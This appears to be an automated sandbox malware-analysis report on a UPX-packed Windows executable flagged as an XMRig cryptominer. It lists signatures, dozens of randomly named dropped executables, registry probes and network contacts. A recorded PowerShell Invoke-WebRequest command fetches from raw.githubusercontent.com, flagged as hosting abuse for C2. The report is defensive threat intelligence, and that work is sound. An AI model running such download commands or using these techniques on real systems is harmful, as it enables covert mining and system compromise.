Analysis Overview
SHA256
fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c
Threat Level: Known bad
The file fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
Suspicious use of NtCreateUserProcessOtherParentProcess
xmrig
Xmrig family
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Modifies Installed Components in the registry
Blocklisted process makes network request
UPX packed file
Executes dropped EXE
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Unsigned PE
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Modifies registry class
Uses Volume Shadow Copy WMI provider
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 22:03
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xmrig family
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 22:03
Reported
2024-06-03 22:04
Platform
win10v2004-20240508-en
Max time kernel
61s
Max time network
64s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 13192 created 60 | N/A | C:\Windows\system32\WerFaultSecure.exe | C:\Windows\system32\svchost.exe |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Windows directory
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFaultSecure.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFaultSecure.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFaultSecure.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFaultSecure.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFaultSecure.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WerFaultSecure.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe
"C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4440,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:8
C:\Windows\System\EGebloh.exe
C:\Windows\System\EGebloh.exe
C:\Windows\System\HVnKEbP.exe
C:\Windows\System\HVnKEbP.exe
C:\Windows\System\dosBnHK.exe
C:\Windows\System\dosBnHK.exe
C:\Windows\System\nvqPqLS.exe
C:\Windows\System\nvqPqLS.exe
C:\Windows\System\OXtxtQh.exe
C:\Windows\System\OXtxtQh.exe
C:\Windows\System\gyAArSv.exe
C:\Windows\System\gyAArSv.exe
C:\Windows\System\rryBCfj.exe
C:\Windows\System\rryBCfj.exe
C:\Windows\System\drWhckd.exe
C:\Windows\System\drWhckd.exe
C:\Windows\System\CVOrTeF.exe
C:\Windows\System\CVOrTeF.exe
C:\Windows\System\MzpuCdi.exe
C:\Windows\System\MzpuCdi.exe
C:\Windows\System\TqAtqit.exe
C:\Windows\System\TqAtqit.exe
C:\Windows\System\uEdKAOj.exe
C:\Windows\System\uEdKAOj.exe
C:\Windows\System\iPOTTHG.exe
C:\Windows\System\iPOTTHG.exe
C:\Windows\System\rHjxxWi.exe
C:\Windows\System\rHjxxWi.exe
C:\Windows\System\KthDHMg.exe
C:\Windows\System\KthDHMg.exe
C:\Windows\System\yQBdyMC.exe
C:\Windows\System\yQBdyMC.exe
C:\Windows\System\BfGNSwl.exe
C:\Windows\System\BfGNSwl.exe
C:\Windows\System\KASLlmi.exe
C:\Windows\System\KASLlmi.exe
C:\Windows\System\HXjJCXz.exe
C:\Windows\System\HXjJCXz.exe
C:\Windows\System\qgbsBDe.exe
C:\Windows\System\qgbsBDe.exe
C:\Windows\System\xUwnfsN.exe
C:\Windows\System\xUwnfsN.exe
C:\Windows\System\GQAOFPS.exe
C:\Windows\System\GQAOFPS.exe
C:\Windows\System\DLZdMuv.exe
C:\Windows\System\DLZdMuv.exe
C:\Windows\System\TXQMVSM.exe
C:\Windows\System\TXQMVSM.exe
C:\Windows\System\rxxvXpj.exe
C:\Windows\System\rxxvXpj.exe
C:\Windows\System\UXyqrdo.exe
C:\Windows\System\UXyqrdo.exe
C:\Windows\System\IiPflOL.exe
C:\Windows\System\IiPflOL.exe
C:\Windows\System\chnwyIe.exe
C:\Windows\System\chnwyIe.exe
C:\Windows\System\dyQgmsC.exe
C:\Windows\System\dyQgmsC.exe
C:\Windows\System\XtEzAlr.exe
C:\Windows\System\XtEzAlr.exe
C:\Windows\System\uzRwZRB.exe
C:\Windows\System\uzRwZRB.exe
C:\Windows\System\nLsYbUw.exe
C:\Windows\System\nLsYbUw.exe
C:\Windows\System\AbnyYTw.exe
C:\Windows\System\AbnyYTw.exe
C:\Windows\System\xAJnVqs.exe
C:\Windows\System\xAJnVqs.exe
C:\Windows\System\FyJczxA.exe
C:\Windows\System\FyJczxA.exe
C:\Windows\System\WyZGpxG.exe
C:\Windows\System\WyZGpxG.exe
C:\Windows\System\mNpyYRO.exe
C:\Windows\System\mNpyYRO.exe
C:\Windows\System\slNoXlM.exe
C:\Windows\System\slNoXlM.exe
C:\Windows\System\PlzORpR.exe
C:\Windows\System\PlzORpR.exe
C:\Windows\System\rdOotBa.exe
C:\Windows\System\rdOotBa.exe
C:\Windows\System\ShhgsnN.exe
C:\Windows\System\ShhgsnN.exe
C:\Windows\System\caPSkYs.exe
C:\Windows\System\caPSkYs.exe
C:\Windows\System\kvlMlkr.exe
C:\Windows\System\kvlMlkr.exe
C:\Windows\System\PbVVaJX.exe
C:\Windows\System\PbVVaJX.exe
C:\Windows\System\LKfpcli.exe
C:\Windows\System\LKfpcli.exe
C:\Windows\System\nJEaLBE.exe
C:\Windows\System\nJEaLBE.exe
C:\Windows\System\nHWvPxv.exe
C:\Windows\System\nHWvPxv.exe
C:\Windows\System\LkaVFEE.exe
C:\Windows\System\LkaVFEE.exe
C:\Windows\System\uhKQmDl.exe
C:\Windows\System\uhKQmDl.exe
C:\Windows\System\iersgYw.exe
C:\Windows\System\iersgYw.exe
C:\Windows\System\kyCXIAy.exe
C:\Windows\System\kyCXIAy.exe
C:\Windows\System\WVpMJKb.exe
C:\Windows\System\WVpMJKb.exe
C:\Windows\System\LmizchL.exe
C:\Windows\System\LmizchL.exe
C:\Windows\System\uBeeRyj.exe
C:\Windows\System\uBeeRyj.exe
C:\Windows\System\jBaPLbW.exe
C:\Windows\System\jBaPLbW.exe
C:\Windows\System\SBlKeAP.exe
C:\Windows\System\SBlKeAP.exe
C:\Windows\System\QwiphrM.exe
C:\Windows\System\QwiphrM.exe
C:\Windows\System\kqdfHfh.exe
C:\Windows\System\kqdfHfh.exe
C:\Windows\System\gnUNcQI.exe
C:\Windows\System\gnUNcQI.exe
C:\Windows\System\zFfHncM.exe
C:\Windows\System\zFfHncM.exe
C:\Windows\System\LJFPXZE.exe
C:\Windows\System\LJFPXZE.exe
C:\Windows\System\eXrSiLc.exe
C:\Windows\System\eXrSiLc.exe
C:\Windows\System\wkCkCUb.exe
C:\Windows\System\wkCkCUb.exe
C:\Windows\System\gmUQnmg.exe
C:\Windows\System\gmUQnmg.exe
C:\Windows\System\RYdmtNs.exe
C:\Windows\System\RYdmtNs.exe
C:\Windows\System\GqxlEUf.exe
C:\Windows\System\GqxlEUf.exe
C:\Windows\System\oKofPji.exe
C:\Windows\System\oKofPji.exe
C:\Windows\System\ylECVUZ.exe
C:\Windows\System\ylECVUZ.exe
C:\Windows\System\BismCxM.exe
C:\Windows\System\BismCxM.exe
C:\Windows\System\NLdxkqy.exe
C:\Windows\System\NLdxkqy.exe
C:\Windows\System\wgsixeX.exe
C:\Windows\System\wgsixeX.exe
C:\Windows\System\dQuXWHH.exe
C:\Windows\System\dQuXWHH.exe
C:\Windows\System\iZYNCQF.exe
C:\Windows\System\iZYNCQF.exe
C:\Windows\System\DRUseWC.exe
C:\Windows\System\DRUseWC.exe
C:\Windows\System\QqpvYrJ.exe
C:\Windows\System\QqpvYrJ.exe
C:\Windows\System\vLEQFEK.exe
C:\Windows\System\vLEQFEK.exe
C:\Windows\System\IMmosIR.exe
C:\Windows\System\IMmosIR.exe
C:\Windows\System\MjPJDbP.exe
C:\Windows\System\MjPJDbP.exe
C:\Windows\System\mHwsRzo.exe
C:\Windows\System\mHwsRzo.exe
C:\Windows\System\TZhYlXV.exe
C:\Windows\System\TZhYlXV.exe
C:\Windows\System\GglaWXs.exe
C:\Windows\System\GglaWXs.exe
C:\Windows\System\kizoJVe.exe
C:\Windows\System\kizoJVe.exe
C:\Windows\System\iYqUvID.exe
C:\Windows\System\iYqUvID.exe
C:\Windows\System\VLALABx.exe
C:\Windows\System\VLALABx.exe
C:\Windows\System\jjRGHPf.exe
C:\Windows\System\jjRGHPf.exe
C:\Windows\System\oSKOgdq.exe
C:\Windows\System\oSKOgdq.exe
C:\Windows\System\dOpfmyV.exe
C:\Windows\System\dOpfmyV.exe
C:\Windows\System\vUAhTIC.exe
C:\Windows\System\vUAhTIC.exe
C:\Windows\System\nbRRWzK.exe
C:\Windows\System\nbRRWzK.exe
C:\Windows\System\jbxgxiM.exe
C:\Windows\System\jbxgxiM.exe
C:\Windows\System\aKIWKeM.exe
C:\Windows\System\aKIWKeM.exe
C:\Windows\System\YaQZaJY.exe
C:\Windows\System\YaQZaJY.exe
C:\Windows\System\qAqaFSL.exe
C:\Windows\System\qAqaFSL.exe
C:\Windows\System\BqRWApF.exe
C:\Windows\System\BqRWApF.exe
C:\Windows\System\VBHrDKI.exe
C:\Windows\System\VBHrDKI.exe
C:\Windows\System\XXtwGVm.exe
C:\Windows\System\XXtwGVm.exe
C:\Windows\System\zVjVXNs.exe
C:\Windows\System\zVjVXNs.exe
C:\Windows\System\VwbwvrN.exe
C:\Windows\System\VwbwvrN.exe
C:\Windows\System\brhWrpO.exe
C:\Windows\System\brhWrpO.exe
C:\Windows\System\blfGmda.exe
C:\Windows\System\blfGmda.exe
C:\Windows\System\wVCpxkt.exe
C:\Windows\System\wVCpxkt.exe
C:\Windows\System\WItkmkE.exe
C:\Windows\System\WItkmkE.exe
C:\Windows\System\esWmvru.exe
C:\Windows\System\esWmvru.exe
C:\Windows\System\sYHSFoZ.exe
C:\Windows\System\sYHSFoZ.exe
C:\Windows\System\PjSoNrd.exe
C:\Windows\System\PjSoNrd.exe
C:\Windows\System\ldVpkXv.exe
C:\Windows\System\ldVpkXv.exe
C:\Windows\System\WpNHZbq.exe
C:\Windows\System\WpNHZbq.exe
C:\Windows\System\jquTvcl.exe
C:\Windows\System\jquTvcl.exe
C:\Windows\System\bJQJUZy.exe
C:\Windows\System\bJQJUZy.exe
C:\Windows\System\KUqekPL.exe
C:\Windows\System\KUqekPL.exe
C:\Windows\System\AZwliaS.exe
C:\Windows\System\AZwliaS.exe
C:\Windows\System\gWDFFgT.exe
C:\Windows\System\gWDFFgT.exe
C:\Windows\System\BhqEqGi.exe
C:\Windows\System\BhqEqGi.exe
C:\Windows\System\WugYHPZ.exe
C:\Windows\System\WugYHPZ.exe
C:\Windows\System\KWGGJlQ.exe
C:\Windows\System\KWGGJlQ.exe
C:\Windows\System\mSUpdWu.exe
C:\Windows\System\mSUpdWu.exe
C:\Windows\System\BBOfBBl.exe
C:\Windows\System\BBOfBBl.exe
C:\Windows\System\FsfgaDM.exe
C:\Windows\System\FsfgaDM.exe
C:\Windows\System\TnaMPyG.exe
C:\Windows\System\TnaMPyG.exe
C:\Windows\System\HdZyzBj.exe
C:\Windows\System\HdZyzBj.exe
C:\Windows\System\cnuRWnX.exe
C:\Windows\System\cnuRWnX.exe
C:\Windows\System\veXmlds.exe
C:\Windows\System\veXmlds.exe
C:\Windows\System\nxlGSml.exe
C:\Windows\System\nxlGSml.exe
C:\Windows\System\SlesPOU.exe
C:\Windows\System\SlesPOU.exe
C:\Windows\System\RObItDu.exe
C:\Windows\System\RObItDu.exe
C:\Windows\System\QimWawl.exe
C:\Windows\System\QimWawl.exe
C:\Windows\System\PiOQtTJ.exe
C:\Windows\System\PiOQtTJ.exe
C:\Windows\System\cbYJHoF.exe
C:\Windows\System\cbYJHoF.exe
C:\Windows\System\zNGaMbj.exe
C:\Windows\System\zNGaMbj.exe
C:\Windows\System\cFLluYe.exe
C:\Windows\System\cFLluYe.exe
C:\Windows\System\hDNRKre.exe
C:\Windows\System\hDNRKre.exe
C:\Windows\System\XVRAHSy.exe
C:\Windows\System\XVRAHSy.exe
C:\Windows\system32\WerFaultSecure.exe
"C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 60 -i 60 -h 472 -j 468 -s 480 -d 0
C:\Windows\system32\WerFaultSecure.exe
C:\Windows\system32\WerFaultSecure.exe -u -p 60 -s 2184
Network
| Country | Destination | Domain | Proto |
| DE | 3.120.98.217:8080 | | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 22:03
Reported
2024-06-03 22:19
Platform
win11-20240426-en
Max time kernel
957s
Max time network
512s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | N/A | N/A |
| File opened (read-only) | \??\D: | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Windows directory
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | N/A | N/A |
